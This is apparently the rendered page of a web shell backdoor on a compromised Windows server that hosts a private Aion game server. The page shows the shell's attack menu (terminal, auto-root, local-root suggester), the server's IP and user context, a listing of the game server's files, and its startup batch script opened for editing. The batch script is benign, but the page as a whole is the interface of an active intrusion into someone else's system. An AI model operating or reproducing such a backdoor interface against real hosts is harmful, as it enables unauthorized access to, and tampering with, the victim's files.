Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.84
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Servidor Aion - OLD CLASS /
Delete
Unzip
Name
Size
Permission
Date
Action
BACKUP COMMANDS PLAYER
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
SRC Vortex Aion - Atualizado em 02 Fevereiro as 05AM
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
Tabelas Custom SQL + Emulador da VORTEX AION
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
chat-server
[ DIR ]
drwxrwxrwx
2025-06-03 05:13
game-server
[ DIR ]
drwxrwxrwx
2025-06-04 14:54
login-server
[ DIR ]
drwxrwxrwx
2025-06-03 05:13
Aion Sys Editor.exe
3.32
MB
-rwxrwxrwx
2025-04-17 01:21
Bloqueio portas.bat
1.38
KB
-rwxrwxrwx
2025-05-03 20:12
Iniciar OldClassAion Server.bat
2.08
KB
-rwxrwxrwx
2025-04-30 20:20
OldClass-PathFinding-DinamicSimulator.html
59.46
KB
-rw-rw-rw-
2025-07-24 23:24
ShugoConsole.exe
4.62
MB
-rwxrwxrwx
2025-03-26 00:46
code.mp4
9.57
MB
-rw-rw-rw-
2025-07-31 05:34
prt_txt_structured_editable.py
8.72
KB
-rw-rw-rw-
2025-07-21 19:56
Save
Rename
@echo off title Inicializador Automático - OLD AION color 0A :: Verificar se o XAMPP está em execução call :printBanner "INICIANDO CHECAGEM XAMPP" call :checkXAMPP :: Função para verificar se o XAMPP está em execução :checkXAMPP tasklist /fi "imagename eq xampp-control.exe" 2>NUL | find /i "xampp-control.exe" > NUL if errorlevel 1 ( echo [INFO] XAMPP pausado. Iniciando XAMPP... start "" "C:\xampp\xampp-control.exe" timeout /t 15 /nobreak >nul echo [INFO] XAMPP iniciado com sucesso. ) else ( echo [INFO] XAMPP operando normalmente ) :: Cabeçalho call :printBanner "INICIANDO CHAT SERVER" if exist "C:\Servidor Aion - OLD AION\chat-server" ( pushd "C:\Servidor Aion - OLD AION\chat-server" start start.bat popd ) else ( echo [ERRO] Pasta do CHAT SERVER não encontrada. Pulando etapa. ) call :countdown 5 call :printBanner "INICIANDO LOGIN SERVER" if exist "C:\Servidor Aion - OLD AION\login-server" ( pushd "C:\Servidor Aion - OLD AION\login-server" start start.bat popd ) else ( echo [ERRO] Pasta do LOGIN SERVER não encontrada. Pulando etapa. ) call :countdown 10 call :printBanner "LIMPANDO CACHE DO GAME SERVER" if exist "C:\Servidor Aion - OLD AION\game-server\cache" ( rd /s /q "C:\Servidor Aion - OLD AION\game-server\cache" echo [INFO] Cache apagado com sucesso. ) else ( echo [AVISO] Pasta de cache não encontrada. Pulando limpeza. ) call :countdown 5 call :printBanner "INICIANDO GAME SERVER" if exist "C:\Servidor Aion - OLD AION\game-server" ( pushd "C:\Servidor Aion - OLD AION\game-server" start start.bat popd ) else ( echo [ERRO] Pasta do GAME SERVER não encontrada. Pulando etapa. ) call :countdown 5 call :printBanner "DONE" exit :: Função para contagem regressiva :countdown set /a time=%~1 :loop if %time% geq 0 ( echo [INFO] %time% segundos restantes... timeout /t 1 >nul set /a time=%time%-1 goto loop ) :: Função de banner :printBanner set "msg=%~1" echo. echo ====== %msg% ====== echo.